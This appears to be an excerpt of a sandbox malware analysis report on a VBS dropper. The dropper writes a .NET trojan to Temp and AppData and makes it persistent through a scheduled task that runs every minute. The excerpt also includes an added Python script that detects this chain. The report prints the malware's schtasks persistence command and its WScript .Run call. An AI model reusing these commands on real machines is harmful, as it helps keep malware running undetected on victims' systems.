Source: 12.2.task.exe.12fce598.5.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.task.exe.12fce598.5.raw.unpack, Helper.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.task.exe.12fce598.5.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.task.exe.12fce598.5.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.task.exe.13f0000.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.task.exe.13f0000.2.raw.unpack, Helper.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.task.exe.13f0000.2.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.task.exe.13f0000.2.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.task.exe.12f80918.3.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.task.exe.12f80918.3.raw.unpack, Helper.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.task.exe.12f80918.3.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.task.exe.12f80918.3.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.task.exe.12317740.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 16.2.task.exe.12317740.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 16.2.task.exe.122c9ac0.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 16.2.task.exe.122c9ac0.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 12.2.task.exe.12fa7760.4.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 12.2.task.exe.12fa7760.4.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 12.2.task.exe.13f0000.2.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 12.2.task.exe.13f0000.2.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 12.2.task.exe.12fce598.5.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 12.2.task.exe.12fce598.5.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 16.2.task.exe.122f0908.2.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 16.2.task.exe.122f0908.2.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 12.2.task.exe.12f80918.3.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 12.2.task.exe.12f80918.3.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winVBS@12/9@6/3
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | File created: C:\Users\user\AppData\Roaming\task.exe
Source: C:\Users\user\AppData\Roaming\task.exe | Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1204
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Mutant created: \Sessions\1\BaseNamedObjects\orLUmecz6hXR75b4
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\WindowsApp.exe "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe"
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1204 -s 3304
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\WindowsApp.exe "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe"
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe"
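The process-creation lines above carry the whole chain: wscript.exe drops and starts WindowsApp.exe from %TEMP%, WindowsApp.exe registers a scheduled task named "task" that runs C:\Users\user\AppData\Roaming\task.exe every minute, and the later task.exe instances appear with no recorded parent because the Task Scheduler service starts them. The following is an added example, not Joe Sandbox code, that parses lines in this format into a parent-to-child tree and applies the two detections a hunter would write from them: a script host launching an executable from a user-writable directory (the idea behind the Sigma "WScript or CScript Dropper" hit in the overview), and schtasks /create with a minute-level trigger whose /tr target sits under AppData, Temp, Public or ProgramData. The sample lines are constructed to mirror the report; the five-minute repeat threshold and the list of user-writable path markers are assumptions.

```python
import re
from typing import Dict, List

# Added example, not Joe Sandbox code. Parses "Process created" report lines
# into a child -> parent map and applies two detections:
#   1. wscript.exe/cscript.exe starting an .exe from a user-writable directory;
#   2. schtasks.exe /create with /sc minute and a /tr target in a user path.
# SAMPLE_LINES is constructed to mirror the report's process-creation events.
SAMPLE_LINES = [
    r'Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs"',
    r'Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\WindowsApp.exe "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe"',
    r'Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe"',
    r'Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'Source: unknown Process created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe',
]

LINE_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<image>\S+) ?(?P<cmdline>.*)$")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumed set of path fragments a standard user can write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_events(lines: List[str]) -> List[Dict[str, str]]:
    """One dict per parsable line: parent image, child image, child command line."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def build_tree(events: List[Dict[str, str]]) -> Dict[str, str]:
    """child image -> parent image ('unknown' when the report has no parent)."""
    return {e["image"]: e["parent"] for e in events}


def lineage(tree: Dict[str, str], image: str) -> List[str]:
    """Walk child -> parent until the chain ends at 'unknown' or would loop."""
    chain = [image]
    while chain[-1] in tree and tree[chain[-1]] != "unknown" and tree[chain[-1]] not in chain:
        chain.append(tree[chain[-1]])
    return chain


def schtasks_options(tokens: List[str]) -> Dict[str, str]:
    """Map /switch -> value for switches that take an argument (/sc, /mo, /tn, /tr ...)."""
    opts = {}
    for i, tok in enumerate(tokens):
        if tok.startswith("/") and i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
            opts[tok.lower()] = tokens[i + 1]
    return opts


def detect(events: List[Dict[str, str]], max_minutes: int = 5) -> List[Dict]:
    """Apply both rules; max_minutes is the assumed bound for an 'aggressive' repeat."""
    findings = []
    for e in events:
        parent, image, cmd = basename(e["parent"]), e["image"], e["cmdline"]
        if parent in SCRIPT_HOSTS and basename(image).endswith(".exe") and in_user_writable(image):
            findings.append({"rule": "script_host_dropper", "parent": e["parent"], "image": image})
        if basename(image) == "schtasks.exe":
            tokens = tokenize(cmd)
            opts = schtasks_options(tokens)
            if "/create" in (t.lower() for t in tokens) and opts.get("/sc", "").lower() == "minute":
                try:
                    every = int(opts.get("/mo", "1"))
                except ValueError:
                    every = 1
                if every <= max_minutes and in_user_writable(opts.get("/tr", "")):
                    findings.append({"rule": "minute_task_to_user_path", "task": opts.get("/tn"),
                                     "target": opts.get("/tr"), "every_minutes": every})
    return findings


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LINES)
    for f in detect(evs):
        print(f)
    print(" <- ".join(basename(p) for p in lineage(build_tree(evs), r"C:\Windows\System32\schtasks.exe")))
```

On live telemetry the same two rules apply unchanged to Sysmon Event ID 1 (ParentImage, Image, CommandLine) in place of report lines; the lineage helper is there because the task.exe instances have no recorded parent, so correlating them back to the dropper has to go through the schtasks /tr target rather than the process tree.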
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\task.exe | Section loaded: sspicli.dll
(Four further task.exe instances, started by the scheduled task, loaded the identical module set in the same order except that apphelp.dll was not loaded; those four repeated lists are collapsed here.)
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: task.lnk.7.dr | LNK file: ..\..\..\..\..\task.exe
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Binary string: .pdb} source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb_b9 source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C142000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdbH source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Xml.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb1&0 source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbra source: WindowsApp.exe, 00000007.00000002.2431833922.000000001B516000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.pdb@w^ source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: Microsoft.VisualBasic.pdbp source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: *Win32_OperatingSystemblib.pdb A source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbwA source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: 0C:\Windows\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Core.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.pdbq source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C142000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C130000.00000004.00000020.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2432794842.000000001C197000.00000004.00000020.00020000.00000000.sdmp, WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Management.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: mscorlib.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdbVa} source: WindowsApp.exe, 00000007.00000002.2431833922.000000001B516000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Core.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: msymbols\dll\mscorlib.pdbpdb` source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: orlib.pdb source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbm source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe", "1", "true");
            Source: 12.2.task.exe.12fce598.5.raw.unpack, Messages.cs .Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: 12.2.task.exe.13f0000.2.raw.unpack, Messages.cs .Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: 12.2.task.exe.12f80918.3.raw.unpack, Messages.cs .Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: 12.2.task.exe.12fa7760.4.raw.unpack, Messages.cs .Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
